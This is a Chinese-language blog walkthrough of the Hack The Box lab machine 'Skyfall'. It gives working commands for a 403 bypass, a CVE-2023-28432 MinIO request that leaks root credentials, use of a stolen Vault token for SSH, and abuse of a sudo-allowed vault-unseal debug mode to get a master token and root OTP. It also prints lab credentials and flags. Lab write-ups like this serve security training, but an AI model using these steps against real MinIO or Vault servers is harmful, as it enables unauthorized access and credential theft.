Hack The Box - Skyfall

字数统计: 2.6k阅读时长: 13 min

 2024/02/11 

Hack The Box靶场 Sesson 4 WEEK 5 Skyfall靶机

靶机IP：10.10.11.254

信息收集

┌──(root㉿Desktop-Trtyr)-[~]
└─# nmap -sT --min-rate 10000 -p- 10.10.11.254
Starting Nmap 7.94SVN ( http://nmap.org ) at 2024-02-07 13:29 CST
Warning: 10.10.11.254 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.254
Host is up (0.15s latency).
Not shown: 58911 closed tcp ports (conn-refused), 6622 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 35.40 seconds

开放了TCP的22端口、80端口。扫描端口服务详细

┌──(root㉿Desktop-Trtyr)-[~]
└─# nmap -sTCV -O -p22,80 10.10.11.254
Starting Nmap 7.94SVN ( http://nmap.org ) at 2024-02-07 13:32 CST
Nmap scan report for 10.10.11.254
Host is up (0.15s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 65:70:f7:12:47:07:3a:88:8e:27:e9:cb:44:5d:10:fb (ECDSA)
|_  256 74:48:33:07:b7:88:9d:32:0e:3b:ec:16:aa:b4:c8:fe (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Skyfall - Introducing Sky Storage!
|_http-server-header: nginx/1.18.0 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.60 seconds

Web渗透

信息收集

目录扫描

1	dirsearch -u "http://10.10.11.254/" -i 200

啥也没有

XSS测试

发现可能存在XSS的地方

XSS爆破

1	python3 xsstrike.py -u "http://10.10.11.254/?name=12345&email=12345%40test.com&subject=12345&message=12345" --data name,subject,message

失败了

子域名发现

最近突然想到，一个内网环境，我为啥不直接nslookup来看IP下的域名呢？

┌──(root㉿Desktop-Trtyr)-[~]
└─# nslookup 10.10.11.254
254.11.10.10.in-addr.arpa       name = skyfall.htb.
254.11.10.10.in-addr.arpa       name = demo.skyfall.htb.

得到两个域名，host绑定一下。然后看看都是啥东西

域名	说明
skyfall.htb	首页
demo.skyfall.htb	一个后台

网页后台

登录测试

来到后台

给了一个访客的账号密码，试着登录一下

文件上传测试

一个对象存储的网站，感觉不靠谱，试试

失败了，连不上。

403绕过

没招了，试试403绕过吧。

1	http://demo.skyfall.htb/metrics%0a

进来了

发现一个新的域名

1	http://prd23-s3-backend.skyfall.htb/minio/v2/metrics/cluster

添加到hosts里，访问一下

这TM是啥？？？

CVE-2023-28432漏洞测试

特征分析得到这是一个minIO的对象存储，找找开放的漏洞，发现一个CVE-2023-28432漏洞，试试。

POST /minio/bootstrap/v1/verify HTTP/1.1
Host: prd23-s3-backend.skyfall.htb
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/awebp,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

得到信息泄露

"MinioEnv": {
	"MINIO_ACCESS_KEY_FILE": "access_key",
	"MINIO_BROWSER": "off",
	"MINIO_CONFIG_ENV_FILE": "config.env",
	"MINIO_KMS_SECRET_KEY_FILE": "kms_master_key",
	"MINIO_PROMETHEUS_AUTH_TYPE": "public",
	"MINIO_ROOT_PASSWORD": "GkpjkmiVmpFuL2d3oRx0",
	"MINIO_ROOT_PASSWORD_FILE": "secret_key",
	"MINIO_ROOT_USER": "5GrE1B2YGGyZzNHZaIww",
	"MINIO_ROOT_USER_FILE": "access_key",
	"MINIO_SECRET_KEY_FILE": "secret_key",
	"MINIO_UPDATE": "off",
	"MINIO_UPDATE_MINISIGN_PUBKEY": "RWTx5Zr1tiHQLwG9keckT0c45M3AGeHD6IvimQHpyRywVWGbP1aVSGav"
}

这里我们得到

1
2
3

"MINIO_ROOT_USER": "5GrE1B2YGGyZzNHZaIww"
"MINIO_ROOT_PASSWORD": "GkpjkmiVmpFuL2d3oRx0"
"MINIO_UPDATE_MINISIGN_PUBKEY": "RWTx5Zr1tiHQLwG9keckT0c45M3AGeHD6IvimQHpyRywVWGbP1aVSGav"

这是存储桶的用户密码和密钥，我们可以通过这些信息把存储桶下载到本地

存储桶云端到本地

安装MinIO Admin Client

我们需要安装一个MinIO Admin Client，我的环境是Windows，所以我下载的是Windows版本的，如果环境不同，自行选择下载版本。下载链接: MinIO | Code and downloads to create high performance object storage

他有两个下载内容，一个是server，一个client，我们只需要下载client就行。

下载会得到一个mc.exe。我们新建一个minio文件夹，在minio文件夹中创建minio的应用目录bin，存放mc.exe。在minio文件夹中创建minio的数据目录data，存放相关数据文件。在minio文件夹中创建minio的数据目录log，存储相关日志。目录结构如下

- minio
	- bin
		- mc.exe
	- data
	- log

云端到本地

我们需要先设置一个本地的存储桶，名字自定义，选择要下载的云端数据，设置账户密码。

1	./mc.exe alias set myminio http://prd23-s3-backend.skyfall.htb 5GrE1B2YGGyZzNHZaIww GkpjkmiVmpFuL2d3oRx0

我们现在可以查看桶内的内容

1	./mc.exe ls --recursive --versions myminio

可以看到，有一个1.2MiB的askyy/home_backup.tar.gz，这可能是备份文件，我们可以将它打包到本地进行查看。

1	./mc.exe cp --vid 3c498578-8dfe-43b7-b679-32a3fe42018f myminio/askyy/home_backup.tar.gz "C:\Users\Trtyr\Downloads\minio\data"

得到.ssh文件夹，里头有公钥

得到ssh用户askyy

公钥ssh登录测试

ssh登录一下

需要RSA密钥？要么他这个ssh密钥有问题，要么它压根不是用ssh登录。如果ssh密钥不对，我们也没办法；只能假设有其他的方法。

其他登录方式发现

我们目前只能看存储桶，把里头的东西挨个看一遍

我们下载的v1的存储桶里，只有一些目录信息；有一个Finnish_Univ_students_2018.csv；一些.txt文件；发现一个ssh LOGIN@remote.server.fi不知道是干啥用的。

看看其他版本的备份

1	./mc.exe cp --vid 2b75346d-2a47-4203-ab09-3c9f878466b8 myminio/askyy/home_backup.tar.gz "C:\Users\Trtyr\Downloads\minio\data"

在.bashrc里发现个环境变量的定义

1 2	export VAULT_API_ADDR="http://prd23-vault-internal.skyfall.htb" export VAULT_TOKEN="hvs.CAESIJlU9JMYEhOPYv4igdhm9PnZDrabYTobQ4Ymnlq1qY-LGh4KHGh2cy43OVRNMnZhakZDRlZGdGVzN09xYkxTQVE"

发现了一个新域名，添加host访问一下

上网搜了一下特征，这是vault，基于身份的秘密和加密管理系统

Vault登录

下载Vault

1 2	wget http://releases.hashicorp.com/vault/1.15.5/vault_1.15.5_linux_amd64.zip unzip vault_1.15.5_linux_amd64.zip

添加临时环境变量

1
2
3

export VAULT_API_ADDR="http://prd23-vault-internal.skyfall.htb"
export VAULT_TOKEN="hvs.CAESIJlU9JMYEhOPYv4igdhm9PnZDrabYTobQ4Ymnlq1qY-LGh4KHGh2cy43OVRNMnZhakZDRlZGdGVzN09xYkxTQVE"
export VAULT_ADDR="http://prd23-vault-internal.skyfall.htb"

┌──(root㉿Desktop-Trtyr)-[~/Tools]
└─# ./vault login
Token (will be hidden):
WARNING! The VAULT_TOKEN environment variable is set! The value of this
variable will take precedence; if this is unwanted please unset VAULT_TOKEN or
update its value accordingly.

Success! You are now authenticated. The token information displayed below
is already stored in the token helper. You do NOT need to run "vault login"
again. Future Vault requests will automatically use this token.

Key                  Value
---                  -----
token                hvs.CAESIJlU9JMYEhOPYv4igdhm9PnZDrabYTobQ4Ymnlq1qY-LGh4KHGh2cy43OVRNMnZhakZDRlZGdGVzN09xYkxTQVE
token_accessor       rByv1coOBC9ITZpzqbDtTUm8
token_duration       435759h49m54s
token_renewable      true
token_policies       ["default" "developers"]
identity_policies    []
policies             ["default" "developers"]

查看登录role

┌──(root㉿Desktop-Trtyr)-[~/Tools]
└─# ./vault token capabilities ssh/roles
list

┌──(root㉿Desktop-Trtyr)-[~/Tools]
└─# ./vault list ssh/roles
Keys
----
admin_otp_key_role
dev_otp_key_role

现在我们可以尝试进行ssh登录

SSH登录

┌──(root㉿Desktop-Trtyr)-[~/Tools]
└─# ./vault ssh -role dev_otp_key_role -mode OTP -strict-host-key-checking=no askyy@10.10.11.254
Vault could not locate "sshpass". The OTP code for the session is displayed
below. Enter this code in the SSH password prompt. If you install sshpass,
Vault can automatically perform this step for you.
OTP for the session is: 140c780c-092d-01cb-5fc5-5fe6af8d9ab4
(askyy@10.10.11.254) Password:

这里要求输入密码，密码就是上面给的140c780c-092d-01cb-5fc5-5fe6af8d9ab4

主机渗透

user flag

askyy@skyfall:~$ ls
user.txt
askyy@skyfall:~$ cat user.txt
7555ee6e92f71aa2d74b02fc94f44f08

提权

查看可用权限

askyy@skyfall:~$ sudo -l
Matching Defaults entries for askyy on skyfall:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User askyy may run the following commands on skyfall:
    (ALL : ALL) NOPASSWD: /root/vault/vault-unseal -c /etc/vault-unseal.yaml [-vhd]*
    (ALL : ALL) NOPASSWD: /root/vault/vault-unseal -c /etc/vault-unseal.yaml

这里有一些可用的命令

askyy@skyfall:~$ /root/vault/vault-unseal -c /etc/vault-unseal.yaml -v
-bash: /root/vault/vault-unseal: Permission denied
askyy@skyfall:~$ sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -v
[+] Reading: /etc/vault-unseal.yaml
[-] Security Risk!
[-] Master token found in config: ****************************
[>] Enable 'debug' mode for details
[+] Found Vault node: http://prd23-vault-internal.skyfall.htb
[>] Check interval: 5s
[>] Max checks: 5
[>] Checking seal status
[+] Vault sealed: false

发现一个token，但是需要开启debug模式才可以用

开启debug模式

创建一个debug日志文件

1	touch debug.txt

再次运行试试

askyy@skyfall:~$ touch debug.txt
askyy@skyfall:~$ sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -v
[+] Reading: /etc/vault-unseal.yaml
[-] Security Risk!
[-] Master token found in config: ****************************
[>] Enable 'debug' mode for details
[+] Found Vault node: http://prd23-vault-internal.skyfall.htb
[>] Check interval: 5s
[>] Max checks: 5
[>] Checking seal status
[+] Vault sealed: false
askyy@skyfall:~$ cat debug.txt
askyy@skyfall:~$

没生效……可能是权限问题？

askyy@skyfall:~$ ls -la
total 32
drwxr-x--- 4 askyy askyy 4096 Feb 11 05:40 .
drwxr-xr-x 3 root  root  4096 Jan 19 21:33 ..
lrwxrwxrwx 1 askyy askyy    9 Nov  9 21:30 .bash_history -> /dev/null
-rw-r--r-- 1 askyy askyy  220 Jan  6  2022 .bash_logout
-rw-r--r-- 1 askyy askyy 3771 Nov  9 21:30 .bashrc
drwx------ 2 askyy askyy 4096 Oct  9 18:47 .cache
-rw-r--r-- 1 askyy askyy  807 Jan  6  2022 .profile
drwx------ 2 askyy askyy 4096 Jan 18 10:32 .ssh
-rw-rw-r-- 1 askyy askyy    0 Feb 11 05:40 debug.txt
-rw-r----- 1 root  askyy   33 Feb 10 18:27 user.txt

没问题啊？

然后就是长达半天的查资料，结果发现我创建的不是日志文件，人麻了

1
2
3

rm debug.txt
touch debug.log
sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -v

还是不对？感觉好像是参数错了

askyy@skyfall:~$ sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -d -v debug.log
[+] Reading: /etc/vault-unseal.yaml
[-] Security Risk!
[+] Found Vault node: http://prd23-vault-internal.skyfall.htb
[>] Check interval: 5s
[>] Max checks: 5
[>] Checking seal status
[+] Vault sealed: false
askyy@skyfall:~$ cat debug.log
2024/02/11 05:46:08 Initializing logger...
2024/02/11 05:46:08 Reading: /etc/vault-unseal.yaml
2024/02/11 05:46:08 Security Risk!
2024/02/11 05:46:08 Master token found in config: hvs.I0ewVsmaKU1SwVZAKR3T0mmG
2024/02/11 05:46:08 Found Vault node: http://prd23-vault-internal.skyfall.htb
2024/02/11 05:46:08 Check interval: 5s
2024/02/11 05:46:08 Max checks: 5
2024/02/11 05:46:08 Establishing connection to Vault...
2024/02/11 05:46:08 Successfully connected to Vault: http://prd23-vault-internal.skyfall.htb
2024/02/11 05:46:08 Checking seal status
2024/02/11 05:46:08 Vault sealed: false

这次对了，得到了token：hvs.I0ewVsmaKU1SwVZAKR3T0mmG

新建root用户

退出当前的ssh，重新设置一下环境变量

1
2
3

export VAULT_API_ADDR="http://prd23-vault-internal.skyfall.htb"
export VAULT_ADDR="http://prd23-vault-internal.skyfall.htb"
export VAULT_TOKEN="hvs.I0ewVsmaKU1SwVZAKR3T0mmG"

添加一个OTP

┌──(root㉿Desktop-Trtyr)-[~/Tools]
└─# curl \
--header "X-Vault-Token: $VAULT_TOKEN" \
--request POST \
--data '{"ip":"10.10.11.254", "username":"root"}' \
$VAULT_ADDR/v1/ssh/creds/admin_otp_key_role
curl: (3) URL rejected: Malformed input to a URL function
-bash: http://prd23-vault-internal.skyfall.htb/v1/ssh/creds/admin_otp_key_role: 没有那个文件或目录

啊？宿主机重新搞一下。

得到key: 411c0829-1434-529c-17c9-79df5a407c85

登录root用户

可以直接ssh登录

1	ssh root@10.10.11.254

root flag

root@skyfall:~# ls
minio  root.txt  sky_storage  vault
root@skyfall:~# cat root.txt
745d2ff27204b7ce5ef148d399713da3

提交flag

成功！

原文作者：特让他也让

原文链接：https://www.trtyr.top/article/ac6cff19/

发表日期：February 11th 2024, 12:00:00 am

更新日期：March 12th 2024, 9:55:07 am

Next Post

Cobalt Strike加Cloudflare实现IP隐藏
Previous Post

Hack The Box - Pov